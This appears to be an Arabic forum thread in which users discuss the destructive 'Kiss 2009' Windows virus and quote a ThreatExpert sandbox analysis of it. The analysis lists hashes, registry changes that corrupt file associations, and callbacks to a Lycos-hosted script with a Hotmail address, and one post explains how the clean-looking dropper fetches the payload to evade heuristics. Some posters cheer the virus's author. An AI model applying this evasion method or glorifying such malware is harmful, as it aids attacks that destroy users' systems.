• بادئ الموضوع بادئ الموضوع FABs
  • تاريخ البدء تاريخ البدء
الحالة
مغلق و غير مفتوح للمزيد من الردود.
بس انت شكلك مش زعلان اوى
:q::q::q::q:

شكلك كنت عايز تفرمت و جاتلك على الطبطاب
:i::i::i::i:

لا طبعا مش زعلان انا متعود على الفورمات انا بسوي فورمات وبخلص خلال 45 دقيقة وبرجع اكمل شغلي عادي والي مخليني ما ازعل اكثر انو النورتون ضل شغال:king:

بس المصيبة هي قوة الفايروس هذا هو الي سوالي لفة بعقلي ( اول مرة اشوف فايروس بهل القوة )

الله لا يوريك يا زيكا

على العموم حسوي اكبر جهدي اني ارسله لكل شركات الحماية وانهيه لهل اللعين
 

توقيع : FABs
دمج الكاسبر
والافيرا
معا

 
اعذرني انا مترخبط شوي لانو فايروس kiss 2009 جربته بدون شادو يوزر:: لعن ابو الجهاز بس على الاقل النورتون اشتغل مرة ثانية ( هو والانترنت اكسبلورر البرنامجين الوحيدين الي شغالين بكامل وظائفهم ) والنكته اني سويت سكان بالنورتون وطلعلي فايروس tracking cockies :q: ( الي شايف هالرد :: انا قاعد اكتب من على حطام وبقايا وينوزي القديم :: انصح كل الشباب ما حد يجرب ابدا ;kiss 2009 )
والله ما اعرف اضحك او اسكت لانى خايفك تزعل :q:
انا قلت لك يا حبيبي النورتون ما راح يكشف الفايروس
هذا الفايروس اقولك حتى شركة الكاسبر ما قدرت عليه
و لا اى شركة حماية اخرى حتى الافيرا و الباندا :eek:
يعنى فيروس رهيب جدا

واحمد ربك انك مازلت تستطيع فتح بعض البرامج
لانى فى جهازي ما قدرت افتح اى شئ لانى كنت معطل الحماية الذاتيه
للنود فخرب حتى النود حتى كنت معطلها سوها منى و ليس عمدا :hh:

ولكن اعمل فورمات و توكل على الله
حمل النود :bleh: و باقى برامجك و مره اخرى
اقولك فيروس مدمر قول لى لا اريده :d:
 
توقيع : Mr.Najem
وعليكم السلام ورحمة الله وبركاته
انا كل ما اريده ان يتم جمع جميع التقنيات وخواص الحماية فى الكاسبر و الافيرا و النورتون ووضعها فى النود :bleh: مع الحفاظ على خفته و جماله :y:
:d::d::d:
 
والله ما اعرف اضحك او اسكت لانى خايفك تزعل :q:
انا قلت لك يا حبيبي النورتون ما راح يكشف الفايروس
هذا الفايروس اقولك حتى شركة الكاسبر ما قدرت عليه
و لا اى شركة حماية اخرى حتى الافيرا و الباندا :eek:
يعنى فيروس رهيب جدا

واحمد ربك انك مازلت تستطيع فتح بعض البرامج
لانى فى جهازي ما قدرت افتح اى شئ لانى كنت معطل الحماية الذاتيه
للنود فخرب حتى النود حتى كنت معطلها سوها منى و ليس عمدا :hh:

ولكن اعمل فورمات و توكل على الله
حمل النود :bleh: و باقى برامجك و مره اخرى
اقولك فيروس مدمر قول لى لا اريده :d:


خخخخخ الحمد الله انى لم اجرب هذا الفيروس ,, والله اول مرة اشوف مثله على الفيديو اللى انت رافعه فيرس رهيب جدا :cr:
 
توقيع : rodyfolar2008
خخخخخ الحمد الله انى لم اجرب هذا الفيروس ,, والله اول مرة اشوف مثله على الفيديو اللى انت رافعه فيرس رهيب جدا :cr:
هههههه
فعلا فيروس رهيب بكل معنى الكلمة
لو تريده ارسله لك :hh::hh::hh:
امزح معك :q:
 
توقيع : Mr.Najem
والله ما اعرف اضحك او اسكت لانى خايفك تزعل :q:
انا قلت لك يا حبيبي النورتون ما راح يكشف الفايروس
هذا الفايروس اقولك حتى شركة الكاسبر ما قدرت عليه
و لا اى شركة حماية اخرى حتى الافيرا و الباندا :eek:
يعنى فيروس رهيب جدا

واحمد ربك انك مازلت تستطيع فتح بعض البرامج
لانى فى جهازي ما قدرت افتح اى شئ لانى كنت معطل الحماية الذاتيه
للنود فخرب حتى النود حتى كنت معطلها سوها منى و ليس عمدا :hh:

ولكن اعمل فورمات و توكل على الله
حمل النود :bleh: و باقى برامجك و مره اخرى
اقولك فيروس مدمر قول لى لا اريده :d:


لا يا خوي اضحك على الاقل ما تدمر مثل بعض الناس :hh: , على العموم انا ما رح اسكت للفايروس وبرسله لشركه السمانتك :bleh:
 
توقيع : FABs
لا يا خوي اضحك على الاقل ما تدمر مثل بعض الناس :hh: , على العموم انا ما رح اسكت للفايروس وبرسله لشركه السمانتك :bleh:
هههههههه بعض الناس هه ؟ :bleh: قول مثل Virus X
ولكن عندى عذر الا وهو كنت معطل الحماية الذاتيه للنود سهوا منى :no:

بالنسبة للفيروس ارسله 100 مره للسمانتك و ما راح يعملوا اشي :hh:
 
توقيع : Mr.Najem
هههههههه بعض الناس هه ؟ :bleh: قول مثل virus x
ولكن عندى عذر الا وهو كنت معطل الحماية الذاتيه للنود سهوا منى :no:

بالنسبة للفيروس ارسله 100 مره للسمانتك و ما راح يعملوا اشي :hh:

يازلمة ما تكون متشائم ادعوا ربك انو يكتشفوه لانو لصالحنا كلنا
 
توقيع : FABs
يازلمة ما تكون متشائم ادعوا ربك انو يكتشفوه لانو لصالحنا كلنا
:hh: امزح معك يا غالى :bleh:
 
توقيع : Mr.Najem
fabs الحين الفيروس اشتغل وشاف شغله ...لكن الى فهمته من كلامك النورتن والانترنت اكسبلورر شغال ...

هذا دليل على ان نورتن يحمي نفسه ...وليس كبعض البرامج ..لا يحمي نفسه ويريد ان يحمينا ..:hh:
 
توقيع : المدفعـ
fabs الحين الفيروس اشتغل وشاف شغله ...لكن الى فهمته من كلامك النورتن والانترنت اكسبلورر شغال ...



هذا دليل على ان نورتن يحمي نفسه ...وليس كبعض البرامج ..لا يحمي نفسه ويريد ان يحمينا ..:hh:


تعجبني :ok: بس فعلا اخي المدفعــ هالفيروس كارثة واتمنى انو تنحل مشكلته في كل النسخ
 
توقيع : FABs
تعجبني :ok: بس فعلا اخي المدفعــ هالفيروس كارثة واتمنى انو تنحل مشكلته في كل النسخ

لا تخاف هذا الفيروس ما راح ياتيك الى اذا دخلت على المواقع الاباحية والعياذ بالله ...

الى عجبني المبرمج عربي ..:ok:
 
توقيع : المدفعـ
لا تخاف هذا الفيروس ما راح ياتيك الى اذا دخلت على المواقع الاباحية والعياذ بالله ...

الى عجبني المبرمج عربي ..:ok:


عندنا طاقات يا الغالى مهولة

بس للاسف ما نستخدمها

و ان استخدمناها نستخدمها من باب استعراض العضلات فقط
 
توقيع : DrHoOoDa
لا تخاف هذا الفيروس ما راح ياتيك الى اذا دخلت على المواقع الاباحية والعياذ بالله ...



الى عجبني المبرمج عربي ..:ok:

نسفسي اعرف ايش هالموقع الاباحي الي خلاه يعصب لهدرجة ويسوي فايروس بهل القوة ( وممكن مسويه عان يدمر اجهزة وعشان يريح ضميلاه حط رساله انت تدخل مواقع إباحية)


عندنا طاقات يا الغالى مهولة

بس للاسف ما نستخدمها

و ان استخدمناها نستخدمها من باب استعراض العضلات فقط


فعلا ذكي جدا فهو مستعمل اداه نظيفه تقريبا وبعدين بمجرد انك تشغلها ينزل الفايروس بسرعة ويحقن نفسة بالجهاز والمصيبة انه يغير كل قيم الريجستري الخاصة بإمتدادات البرامج والفايلات ليحولها لإمتدادات غير صالح مسمى بــ kiss 2009
 
توقيع : FABs
نسفسي اعرف ايش هالموقع الاباحي الي خلاه يعصب لهدرجة ويسوي فايروس بهل القوة ( وممكن مسويه عان يدمر اجهزة وعشان يريح ضميلاه حط رساله انت تدخل مواقع إباحية)

[/CENTER]

انا عندى شك انه عمل تلك الرسالة ليحرجك
اى بمعنى لو انك اخذت جهازك لمحل صيانة
و فتج الجهاز و قرأ الرسالة ماذا سيكون شعورك :q: ؟
وممكن هو فعلا رجل طيب وعمله ليدمر مدمنى المواقع الاباحيه
 
توقيع : Mr.Najem
انا عندى شك انه عمل تلك الرسالة ليحرجك
اى بمعنى لو انك اخذت جهازك لمحل صيانة
و فتج الجهاز و قرأ الرسالة ماذا سيكون شعورك :q: ؟
وممكن هو فعلا رجل طيب وعمله ليدمر مدمنى المواقع الاباحيه

والله انا ممكن لو منه انتحر :hh:

بس هو ممكن حله ان تفرمت الجهاز كله :f:
 
توقيع : rodyfolar2008
يرفع للأعضاء المتخصصين
 
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
|
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

Submission Summary:
  • Submission details:​
    • Submission received: 2 May 2009, 15:43:40​
    • Processing time: 6 min 50 sec​
    • Submitted sample:​
      • File MD5: 0xCCDF2B876CE9AB6FF5865DEC43DC7A20​
      • File SHA-1: 0x24B67FB127FF1B4349E88A7EBB5FB8E3EADE3131​
      • Filesize: 847,872 bytes​
      • Alias:
        يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
        [Sophos]​
  • Summary of the findings:​
What's been foundSeverity LevelDownloads/requests other files from Internet.
level1.gif



Technical Details:

  • The new window was created, as shown below:​
getimage.aspx


NOTICE: The content shown in the above window is captured automatically and is not controlled or endorsed by ThreatExpert.
Please contact us on this
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
should any material be offensive or inappropriate
and we will ensure any such content is blocked from future viewers of the report.


file_mod.gif
File System Modifications​
  • The following files were created in the system:​
#Filename(s)File SizeFile HashAlias1%Profiles%\Desktop.ini

%DesktopDir%\Desktop.ini
%UserProfile%\Desktop.ini
c:\Inetpub\Desktop.ini
%ProgramFiles%\Desktop.ini 339 bytesMD5: 0xB54BCFD21676D8F1812B2581429267EE
SHA-1: 0xC23B1CB0CA2B99A9C397C38FBF23B99FD89858A0(not available)2%Profiles%\me.bmp
%DesktopDir%\me.bmp
%AppData%\Microsoft\Wallpaper1.bmp
%AppData%\Microsoft\Wallpaper1.gif
%AppData%\Microsoft\Wallpaper1.jpg
%UserProfile%\me.bmp
c:\Inetpub\me.bmp
%ProgramFiles%\me.bmp
%Windir%\me.bmp 725,958 bytesMD5: 0xEAF170A2F30FB1F4A83690E6E99B0C37
SHA-1: 0x6DB8EAF6228DFCDC067D6CA579B6FE8B01F5A8A6(not available)3%Profiles%\me.ico
%DesktopDir%\me.ico
%UserProfile%\me.ico
c:\Inetpub\me.ico
%ProgramFiles%\me.ico
%Windir%\me.ico 60,830 bytesMD5: 0x98E3B2E786EBAA078756C1D34299E5EE
SHA-1: 0x1B8FF8F57E943C94806823193AF240ABDD906514(not available)4%Profiles%\photo\
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

c:\sexygirls.exe
[file and pathname of the sample #1] 847,872 bytesMD5: 0xCCDF2B876CE9AB6FF5865DEC43DC7A20
SHA-1: 0x24B67FB127FF1B4349E88A7EBB5FB8E3EADE3131
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
[Sophos]​
  • Notes:​
    • %Profiles% is a variable that refers to the file system directory containing user profile folders. A typical path is C:\Documents and Settings.​
    • %DesktopDir% is a variable that refers to the file system directory used to physically store file objects on the desktop. A typical path is C:\Documents and Settings\[UserName]\Desktop.​
    • %UserProfile% is a variable that specifies the current user's profile folder. By default, this is C:\Documents and Settings\[UserName] (Windows NT/2000/XP).​
    • %ProgramFiles% is a variable that refers to the Program Files folder. A typical path is C:\Program Files.​
    • %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.​
    • %Windir% is a variable that refers to the Windows installation folder. By default, this is C:\Windows or C:\Winnt.​
  • The following directory was created:​
    • %Profiles%\photo​
reg_mod.gif
Registry Modifications​
  • The following Registry Keys were created:​
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.batfile​
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.rar​
  • The following Registry Key was deleted:​
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\New​
  • The newly created Registry Values are:​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.java]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mdb]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.sam]​
      • (Default) = "VIRUS kiss 2008"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.batfile]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.rar]​
      • (Default) = "VIRUS kiss 2008"​
  • The following Registry Values were deleted:​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\New]​
      • (Default) = "{D969A300-E7FF-11d0-A93B-00A0C90F2719}"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]​
      • CheckedValue = 0x00000001​
  • The following Registry Values were modified:​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.application]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bmp]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.CTT]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.dll]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.inf]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ini]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpeg]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.key]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.log]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mpeg]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mpg]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msc]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ocx]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.sys]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vbs]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile]​
      • (Default) = "VIRUS kiss"​
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]​
      • LegalNoticeCaption = "Virus Kiss 2009"​
      • LegalNoticeText = "�?�"?`"�?� ( ViruS KisS 2009) �?�"?`"�?�​
other_mod.gif
Other details​
  • To mark the presence in the system, the following Mutex objects were created:​
    • _!SHMSFTHISTORY!_​
    • MCICDA_InitCritSection​
    • MCICDA_DeviceCritSec_0​
    • MCICDA_DeviceCritSec_1​
    • MCICDA_DeviceCritSec_2​
    • MCICDA_DeviceCritSec_3​
    • MCICDA_DeviceCritSec_4​
    • MCICDA_DeviceCritSec_5​
    • MCICDA_DeviceCritSec_6​
    • MCICDA_DeviceCritSec_7​
    • MCICDA_DeviceCritSec_8​
    • MCICDA_DeviceCritSec_9​
    • MCICDA_DeviceCritSec_10​
    • MCICDA_DeviceCritSec_11​
    • MCICDA_DeviceCritSec_12​
    • MCICDA_DeviceCritSec_13​
    • MCICDA_DeviceCritSec_14​
    • MCICDA_DeviceCritSec_15​
    • MCICDA_DeviceCritSec_16​
    • MCICDA_DeviceCritSec_17​
    • MCICDA_DeviceCritSec_18​
    • MCICDA_DeviceCritSec_19​
    • MCICDA_DeviceCritSec_20​
    • MCICDA_DeviceCritSec_21​
    • MCICDA_DeviceCritSec_22​
    • MCICDA_DeviceCritSec_23​
    • MCICDA_DeviceCritSec_24​
    • MCICDA_DeviceCritSec_25​
  • The following Internet Connection was established:​
Server NameServer PortConnect as UserConnection Passwordmembers.lycos.co.uk80(null)(null)​
  • The following GET requests were made:​
    • kissvirus/sendmail.php?mail=abualasad@hotmail.com&subject=$4th%20Kiss%20Virus&body=​
    • kissvirus/index.jpg​
  • The data identified by the following URL was then requested from the remote web server:​
All content ("Information") contained in this report is the copyrighted work of Threat Expert Ltd and its associated companies ("ThreatExpert") and may not be copied without the express permission of ThreatExpert.

The Information is provided on an "as is" basis. ThreatExpert disclaims all warranties, whether express or implied, to the maximum extent permitted by law, including the implied warranties that the Information is merchantable, of satisfactory quality, accurate, fit for a particular purpose or need, or non-infringing, unless such implied warranties are legally incapable of exclusion. Further, ThreatExpert does not warrant or make any representations regarding the use or the results of the use of the Information in terms of their correctness, accuracy, reliability, or otherwise.
Copyright © 2009
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
. All rights reserved.




يا شباب هادا تحليل فايروس الــ kiss 2009 شوفو الملف اي يسوي اولا يغير الخلفية وشوفو كيف طريقة زرع الفايروس الاداة تم تصنيفها على انو منخفضة لانو اصلا تقنية الفايروس هي كالآتي :-

يتم استخدام فايروس منخفص او نظيف تقريبا وبمجرد الاتصال بالانترنت يتم تنزيل الفايروس حقنه بنفس الاداة ( عشان هيك الفايروس ما يكشفه بالهيورستيك ) ويعدين يغير قيم الريجستري الخاصة بالامتدادات لتصبح kiss 2009 وغير تعطيله لكل خدمات الويندوز
 
توقيع : FABs
انا عندى شك انه عمل تلك الرسالة ليحرجك
اى بمعنى لو انك اخذت جهازك لمحل صيانة
و فتج الجهاز و قرأ الرسالة ماذا سيكون شعورك :q: ؟
وممكن هو فعلا رجل طيب وعمله ليدمر مدمنى المواقع الاباحيه

مدمنين المواقع الاباحية ...كم مره نصحناهم بترك ها المواقع

ولكن ما يسمعون الكلام الى بهذه الفيروسات ..هو افضل طريقة لجعلهم يتركون هذه المواقع :hh:

مبرمج عربي خطيير ودي اتعرف عليه..:king:
 
توقيع : المدفعـ
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى